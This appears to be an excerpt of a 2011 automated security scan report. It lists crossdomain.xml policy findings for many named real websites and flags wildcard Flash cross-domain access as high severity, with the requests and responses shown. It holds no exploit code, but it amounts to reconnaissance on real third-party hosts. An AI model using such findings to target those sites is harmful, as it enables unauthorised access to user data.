HTTP/1.1 200 OK Server: nginx/0.7.2 Date: Mon, 25 Apr 2011 14:30:25 GMT Content-Type: text/xml Content-Length: 326 Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT Connection: close Set-Cookie: adnectar_id=PObkQ021 P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM" Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://goods43.adnectar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: goods43.adnectar.com |
HTTP/1.1 200 OK Server: nginx/0.7.2 Date: Mon, 25 Apr 2011 14:31:29 GMT Content-Type: text/xml Content-Length: 326 Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT Connection: close Set-Cookie: adnectar_id=PObkQ021 P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM" Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.en25.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.en25.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" Server: Microsoft-IIS/7.5 P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", X-Powered-By: ASP.NET Content-Length: 206 Cache-Control: max-age=0 Date: Mon, 25 Apr 2011 14:54:46 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.shavlik.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: learn.shavlik.com |
HTTP/1.1 200 OK Content-Length: 145 Content-Type: text/xml Content-Location: http://learn.shavlik.com Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT Accept-Ranges: bytes ETag: "4e3f9ebe2a24ca1:1772" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 25 Apr 2011 12:16:43 GMT Connection: close <?xml version="1.0"?> <!-- http://www.foo.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://m.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: m.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:37 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://map.media6degrees |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: map.media6degrees.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"288-1225232951000" Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT Content-Type: application/xml Content-Length: 288 Date: Mon, 25 Apr 2011 14:37:39 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mbox5.offermatica |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: mbox5.offermatica.com |
HTTP/1.1 200 OK ETag: W/"201-1302288767000" Accept-Ranges: bytes Content-Length: 201 Date: Mon, 25 Apr 2011 15:13:56 GMT Connection: close Last-Modified: Fri, 08 Apr 2011 18:52:47 GMT Server: Test & Target Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pda.loveplanet.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pda.loveplanet.ru |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:51:45 GMT Content-Type: text/xml; charset=UTF-8 Content-Length: 145 Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!-- http://loveplanet.ru <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.fetchback |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.fetchback.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:13:58 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Tue, 26 Apr 2011 14:34:49 GMT Content-Type: text/xml Content-Length: 207 Date: Mon, 25 Apr 2011 14:34:49 GMT Server: QS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pl.yumenetworks |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: pl.yumenetworks.com Proxy-Connection: keep-alive Referer: http://games.mochiads.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: yumerm=0rO0ABXcMAAAA |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:53:48 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2 Last-Modified: Sun, 17 Aug 2008 20:39:50 GMT ETag: "10d0439-122-454addb Accept-Ranges: bytes Content-Length: 290 P3P: policyref="http://ads Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://player.vimeo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: player.vimeo.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:03:32 GMT Server: Apache Last-Modified: Thu, 07 Apr 2011 23:28:49 GMT ETag: "3718ce-114-78aece40" Accept-Ranges: bytes Content-Length: 276 Cache-Control: max-age=315360000 Expires: Thu, 22 Apr 2021 16:03:32 GMT Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*"/> <all ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://playspal.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: playspal.com |
HTTP/1.1 200 OK Server: nginx/0.7.63 Date: Mon, 25 Apr 2011 14:54:27 GMT Content-Type: application/xml Connection: close Last-Modified: Tue, 23 Nov 2010 09:52:59 GMT ETag: "9828d2a-68-4ceb8efb" Accept-Ranges: bytes Content-Length: 104 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pretty.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pretty.ru |
HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Apr 2011 14:24:34 GMT Content-Type: text/xml; charset=UTF-8 Content-Length: 145 Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!-- http://loveplanet.ru <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://r2.mail.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: r2.mail.ru |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:29:54 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rbcgaru.hit.gemius |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rbcgaru.hit.gemius.pl |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:44:56 GMT Expires: Tue, 26 Apr 2011 02:44:56 GMT Accept-Ranges: none Cache-Control: max-age=43200 Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT Set-Cookie: Gtestss=Fsq2YwPLQP Set-Cookie: Gdyn=KlSwsBFGvGQp0xo P3P: CP="NOI DSP COR NID PSAo OUR IND" Connection: close Content-Type: text/xml Content-Length: 246 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://hit.gemius.pl --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rs.mail.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: rs.mail.ru |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:45:40 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sun, 24 Apr 2011 21:09:16 GMT Expires: Thu, 21 Apr 2011 21:08:25 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 63651 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://search.twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: search.twitter.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 14:40:08 GMT Server: hi Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT Cache-Control: max-age=1800 Expires: Mon, 25 Apr 2011 15:01:27 GMT Content-Type: application/xml Content-Length: 206 Vary: Accept-Encoding X-Varnish: 124651946 124570955 Age: 521 Via: 1.1 varnish X-Cache-Svr: smf1-aaq-31-sr2.prod X-Cache: HIT X-Cache-Hits: 4 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://widgets.fotocash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: widgets.fotocash.ru |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 25 Apr 2011 14:29:10 GMT Content-Type: text/xml Content-Length: 138 Last-Modified: Thu, 21 Oct 2010 13:56:12 GMT Connection: close Expires: Wed, 25 May 2011 14:29:10 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="*"/> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instantengage |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.instantengage.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 15:46:00 GMT Server: Apache/2.0.50 (Fedora) Last-Modified: Wed, 04 Apr 2007 15:17:04 GMT ETag: "55c03c-ca-f25f3c00" Accept-Ranges: bytes Content-Length: 202 P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA" Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://cache.fimservecdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cache.fimservecdn.com |
HTTP/1.0 200 OK Server: nginx/0.7.67 Content-Type: application/xml ETag: W/"695-1261547040000" Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT Content-Length: 695 Cache-Control: max-age=2592000 Date: Mon, 25 Apr 2011 16:07:44 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspacecdn.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://demr.opt.fimserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: demr.opt.fimserve.com |
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 16:07:45 GMT Content-Type: application/xml Connection: keep-alive ETag: W/"695-1261547040000" Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT Content-Length: 695 Server: ASP/0.0.0.0/0.7.61 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspacecdn.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://desk.opt.fimserve |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: desk.opt.fimserve.com |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 25 Apr 2011 16:12:56 GMT Content-Type: application/xml Connection: keep-alive ETag: W/"695-1261547040000" Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT Content-Length: 695 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ksolo.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="myspace.ksolo.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspace.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.myspacecdn.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://gomail.radar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: gomail.radar.imgsmail.ru |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 14:51:42 GMT Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17 Connection: close Content-Length: 172 Content-Type: text/xml <?xml version="1.0"?><cross |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 24 Apr 2011 21:14:04 GMT Expires: Mon, 25 Apr 2011 21:14:04 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 53567 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://imagesrv.gartner |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: imagesrv.gartner.com |
HTTP/1.1 200 OK Connection: close Content-type: text/xml Last-modified: Mon, 11 Jan 2010 19:57:11 GMT Date: Mon, 25 Apr 2011 12:11:16 GMT Content-Length: 250 ETag: "pv3dca051be9ba6a415 X-PvInfo: [S10232.C10821.A151092 Vary: Accept-Encoding Accept-Ranges: bytes Set-Cookie: TS83f541=3bc17e06277 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.gartner.com" /> <allow-access-from domain="imagesrv" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://img.dt00.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.dt00.net |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:50:50 GMT Content-Type: text/xml Content-Length: 526 Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT Connection: close Expires: Wed, 25 May 2011 14:50:50 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="intv.ru" to-ports="80"/> <allow-http-request <allow-access-from domain="*.intv.ru" to-ports="80"/> ...[SNIP]... <allow-access-from domain="www.liveresult.ru" to-ports="80"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://img.imgsmail.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.imgsmail.ru |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 25 Apr 2011 14:54:43 GMT Content-Type: text/xml Content-Length: 358 Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT Connection: close Expires: Mon, 02 May 2011 14:54:43 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*.files.mail.ru" to-ports="80" /> <allow-access-from domain="img.imgsmail.ru" to-ports="80" /> <allow-access-from domain="*.mail.ru" to-ports="80" /> ...[SNIP]... <allow-access-from domain="mail.ru" to-ports="80" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://img.mail.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img.mail.ru |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 25 Apr 2011 14:34:11 GMT Content-Type: text/xml Content-Length: 358 Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT Connection: close Expires: Mon, 02 May 2011 14:34:11 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*.files.mail.ru" to-ports="80" /> <allow-access-from domain="img.imgsmail.ru" to-ports="80" /> <allow-access-from domain="*.mail.ru" to-ports="80" /> ...[SNIP]... <allow-access-from domain="mail.ru" to-ports="80" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://js.dt00.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: js.dt00.net |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:40:24 GMT Content-Type: text/xml Content-Length: 526 Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT Connection: close Expires: Wed, 25 May 2011 14:40:24 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="intv.ru" to-ports="80"/> <allow-http-request <allow-access-from domain="*.intv.ru" to-ports="80"/> ...[SNIP]... <allow-access-from domain="www.liveresult.ru" to-ports="80"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mail.radar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: mail.radar.imgsmail.ru |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 14:25:12 GMT Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17 Connection: close Content-Length: 172 Content-Type: text/xml <?xml version="1.0"?><cross |
Severity: | Low |
Confidence: | Certain |
Host: | http://mail.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: mail.ru |
HTTP/1.0 200 OK Date: Mon, 25 Apr 2011 14:24:41 GMT Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17 Connection: close Set-Cookie: mrcu=1AB44DB58429635 Content-Length: 343 Content-Type: text/xml <?xml version="1.0"?><cross ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://odnoklassniki.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: odnoklassniki.ru |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"1148-1303437212000" Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT Content-Type: application/xml;charset Content-Length: 1148 Date: Mon, 25 Apr 2011 14:26:37 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-http-request <allow-http- ...[SNIP]... <allow-access-from domain="*.odnoklassniki.ru"/> <allow-access-from domain="odnoklassniki.ua"/> <allow-access-from domain="*.odnoklassniki.ua"/> <allow-access-from domain="odnoklasniki.ru"/> <allow-access-from domain="*.odnoklasniki.ru"/> <allow-access-from domain="odnoklasniki.ua"/> <allow-access-from domain="*.odnoklasniki.ua"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://oth.dt00.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: oth.dt00.net |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Mon, 25 Apr 2011 14:32:23 GMT Content-Type: text/xml Content-Length: 526 Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT Connection: close Expires: Wed, 25 May 2011 14:32:23 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="intv.ru" to-ports="80"/> <allow-http-request <allow-access-from domain="*.intv.ru" to-ports="80"/> ...[SNIP]... <allow-access-from domain="www.liveresult.ru" to-ports="80"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://server.iad |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: server.iad.liveperson.net |
HTTP/1.1 200 OK Content-Length: 526 Content-Type: text/xml Content-Location: http://server.iad Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT Accept-Ranges: bytes ETag: "076249f5c35c91:c30" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Mon, 25 Apr 2011 15:53:10 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.neogames-tech.com" secure="false" /> ...[SNIP]... <allow-access-from domain="secure.neogames-tech.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.qa.neogames-tech ...[SNIP]... <allow-access-from domain="secure.st.neogames-tech ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.gartner.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gartner.com |
HTTP/1.1 200 OK Connection: close Content-type: text/xml Last-modified: Mon, 28 Jan 2008 18:59:12 GMT Date: Mon, 25 Apr 2011 12:10:49 GMT Content-Length: 214 ETag: "pve91a8585e0a42393c X-PvInfo: [S10232.C10821.A151092 Vary: Accept-Encoding Accept-Ranges: bytes Set-Cookie: TS83f541=1da366c651c <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.gartner.com" /> </cross- ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.salesforce.com |
HTTP/1.0 200 OK Server: SFDC Vary: Accept-Encoding Content-Type: text/x-cross-domain Date: Mon, 25 Apr 2011 16:06:12 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.salesforce.com" /> <allow-access-from domain="www.force.com" /> <allow-access-from domain="developer.force.com" /> <allow-access-from domain="salesforce.vo.llnwd.net" /> <allow-access-from domain="www3.stream.co.jp" /> <allow-access-from domain="salesforce.sitestream.com" /> <allow-access-from domain="*.jellyvision-conver ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
